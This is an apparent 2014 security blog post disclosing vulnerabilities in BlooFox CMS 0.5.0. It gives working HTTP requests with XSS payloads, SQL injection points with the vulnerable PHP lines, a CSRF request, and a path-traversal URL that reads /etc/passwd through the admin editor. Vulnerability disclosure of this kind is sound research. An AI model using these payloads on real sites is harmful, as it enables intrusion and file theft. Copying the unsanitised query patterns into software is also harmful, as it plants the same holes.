Friday, 31 January 2014

[EN] BlooFox CMS 0.5.0 - Multiple vulnerabilities

Last days I saw that someone found few vulnerabilities in CMS I presented at my course.

 I decide to check it again, and below you will find few informations about it ;)

 Enjoy.

 All vulnerabilities was found for admin user logged in. I didn't build the site ;)
1. Multiple XSS in error from MySQL:

 Parameters:
lang_id, blocked, tmpl_id, urls, lang_id,  mod_rewrite,  meta_charset, 
meta_doctype, default_group, u1, u2, u7, u4, u30, u40, u8, u3, u5, u9, 
u20, status, group_id, page, backend, content, settings, permissions, 
tools, demo,object_w,object_d

 Exaple request:
---<request>---
POST /k/bloofox/admin/index.php?mode=content&page=articles&action=new&page_id=0 HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 116

title=asdasd&text=asdasd&insert=top&blocked='"%3e%3cbody%2fonload%3dalert(3)%3e&startdate=&enddate=&send=Add+Article
---<request>---

 And:
---<response>---
HTTP/1.1 200 OK
Date: Thu, 30 Jan 2014 12:46:16 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 448
Connection: close
Content-Type: text/html

</td></table><b>Database error:</b> Invalid SQL: INSERT INTO bfCMS_sys_content VALUES ('','','99965','','','asdasd','asdasd',''"><body/onload=alert(3)>','admin','1391085976','','','','')<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(3)>','admin','1391085976','','','','')' at line 1)<br>
<br>
Session halted.
---<response>---


2. CSRF (when adding project)
---<request>---POST /k/bloofox/admin/index.php?mode=settings&page=projects&action=new HTTP/1.1
Host:
(...)
Content-Length: 229

name=asdasd&lang_id=1&tmpl_id=1&urls=<CSRF_IS_POSSIBLE_HERE>&meta_title=asdasd&mod_rewrite=0&mail=&meta_copyright=&meta_desc=&meta_keywords=&meta_author=&meta_charset=ISO-8859-1&meta_doctype=XHTML+1.0+Transitional&default_group=1&send=Add+Project
---<request>---

3. Multiple SQL Injections

---<request>---
POST /k/bloofox/admin/index.php?mode=settings&page=projects&action=new HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 263

name=asdasd&lang_id='"%3e%3cbody%2fonload%3dalert(3)%3e&tmpl_id=1&urls=asdasd&meta_title=asdasd&mod_rewrite=0&mail=&meta_copyright=&meta_desc=&meta_keywords=&meta_author=&meta_charset=ISO-8859-1&meta_doctype=XHTML+1.0+Transitional&default_group=1&send=Add+Project
---<request>---


Or here:


---<request>---
POST /k/bloofox/admin/index.php?mode=content&page=articles&action=new&page_id=0 HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 116

title=asdasd&text=asdasd&insert=top&blocked='HERE&startdate=&enddate=&send=Add+Article
---<request>---

Or here:

---<request>---
POST /k/bloofox/admin/index.php?mode=settings&page=plugins&action=edit HTTP/1.1
Host: 10.149.14.77
(...)
Content-Length: 58

status='"%3e%3cbody%2fonload%3dalert(3)%3e&pid=1&send=Save
---<request>---


Parameters:
a) tmpl_id

---<code>---
./system/class_admincenter.php:119:            
$db->query("SELECT name FROM ".$tbl_prefix."sys_template WHERE tid = '".$tmpl_id."' ORDER BY tid");

---<code>---

b) urls

---<code>---
./admin/include/inc_settings_projects.php:130:                 
$db->query("UPDATE ".$tbl_prefix."sys_config SET urls = '".$_POST['urls']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");

---<code>---
c) lang_id

---<code>---
./system/class_admincenter.php:104:            
$db->query("SELECT name FROM ".$tbl_prefix."sys_lang WHERE lid = '".$lang_id."' ORDER BY lid");
---<code>---

d) mod_rewrite

---<code>---

./admin/include/inc_settings_projects.php:146:                 
$db->query("UPDATE ".$tbl_prefix."sys_config SET mod_rewrite = '".$_POST['mod_rewrite']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");

---<code>---

e) meta_charset

---<code>---

./admin/include/inc_settings_projects.php:142:                
$db->query("UPDATE ".$tbl_prefix."sys_config SET meta_charset = '".$_POST['meta_charset']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");

---<code>---

f) meta_doctype

---<code>---

./admin/include/inc_settings_projects.php:143:                
$db->query("UPDATE ".$tbl_prefix."sys_config SET meta_doctype = '".$_POST['meta_doctype']."' WHERE cid = '".$_POST['cid']."' LIMIT 1");

---<code>---

g) default_group

---<code>---
./plugins/register_form_simple/register.php:
121: $db2->query("SELECT name FROM ".$tbl_prefix."sys_usergroup WHERE gid = '".$sys_config_vars["default_group"]."' ORDER BY gid");

---<code>---

h) from 'u1' to 'u11' and also u20,u30,u40 parametersŁ
---<code>---
k@lab:~/public_html/bloofox$ grep -n -r -e "UPDATE" ./ | grep "sys_setting SET setting_value =" | grep POST
./admin/include/inc_settings_general.php:27:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u1']."' WHERE sid = '1' LIMIT 1");
./admin/include/inc_settings_general.php:28:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u2']."' WHERE sid = '2' LIMIT 1");
./admin/include/inc_settings_general.php:29:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u3']."' WHERE sid = '3' LIMIT 1");
./admin/include/inc_settings_general.php:30:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u4']."' WHERE sid = '4' LIMIT 1");
./admin/include/inc_settings_general.php:31:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u5']."' WHERE sid = '5' LIMIT 1");
./admin/include/inc_settings_general.php:35:                    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u6']."' WHERE sid = '6' LIMIT 1");
./admin/include/inc_settings_general.php:41:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u7']."' WHERE sid = '7' LIMIT 1");
./admin/include/inc_settings_general.php:42:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u8']."' WHERE sid = '8' LIMIT 1");
./admin/include/inc_settings_general.php:43:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u9']."' WHERE sid = '9' LIMIT 1");
./admin/include/inc_settings_general.php:47:                    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u10']."' WHERE sid = '10' LIMIT 1");
./admin/include/inc_settings_general.php:57:                    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u12']."' WHERE sid = '12' LIMIT 1");
./admin/include/inc_settings_general.php:65:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u20']."' WHERE sid = '20' LIMIT 1");
./admin/include/inc_settings_general.php:66:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u30']."' WHERE sid = '30' LIMIT 1");
./admin/include/inc_settings_general.php:67:    $db->query("UPDATE ".$tbl_prefix."sys_setting SET setting_value = '".$_POST['u40']."' WHERE sid = '40' LIMIT 1");
k@lab:~/public_html/bloofox$
---<code>---

i) status
---<code>---
./admin/include/inc_user_user.php:
434:          $db->query("SELECT uid FROM ".$tbl_prefix."sys_user WHERE status LIKE '".$_SESSION["filter_user"]."'");

./admin/include/inc_user_user.php:
442:          $db->query("SELECT * FROM ".$tbl_prefix."sys_user WHERE status LIKE '".$_SESSION["filter_user"]."' ORDER BY uid LIMIT ".$start.",".$limit."");

---<code>---

j) pid
---<code>---
./admin/include/inc_settings_plugins.php:
137:           $db->query("SELECT pid,name,status FROM ".$tbl_prefix."sys_plugin WHERE pid = '".$_GET['pid']."' ORDER BY pid LIMIT 1");
---<code>---   

Also:
backend, content, settings, permissions, tools, demo, object_w,object_d





4. Local file include:
http://ip/k/bloofox/admin/index.php?mode=settings&page=editor&fileurl=../../../../../../../../../../../../../../etc/passwd



Code:
---
k@lab:~/public_html/bloofox$ cat -n admin/include/inc_settings_editor.php |less
(...)

    60  if(isset($_GET["fileurl"])) {
    61          $fileurl = "../".$_GET["fileurl"];    [1]
    62  }
    63
    64  if(file_exists($fileurl)) {
    65          $filelength = filesize($fileurl);
    66          $readfile = fopen($fileurl,"r");    [2]
    67          $file = fread($readfile,$filelength);
    68          fclose($readfile);
    69  }

(...)
---


5. XSS over GEThttp://10.149.14.77/k/bloofox/admin/index.php?mode=settings&page=editor&fileurl='><body onload=alert(1)>
And so on... ;)

 I suggest zou to read this source.
It is really interesting. ;)
Posted by at
Labels: , , ,

No comments:

Post a Comment

What do You think...?

Subscribe to: Post Comments (Atom)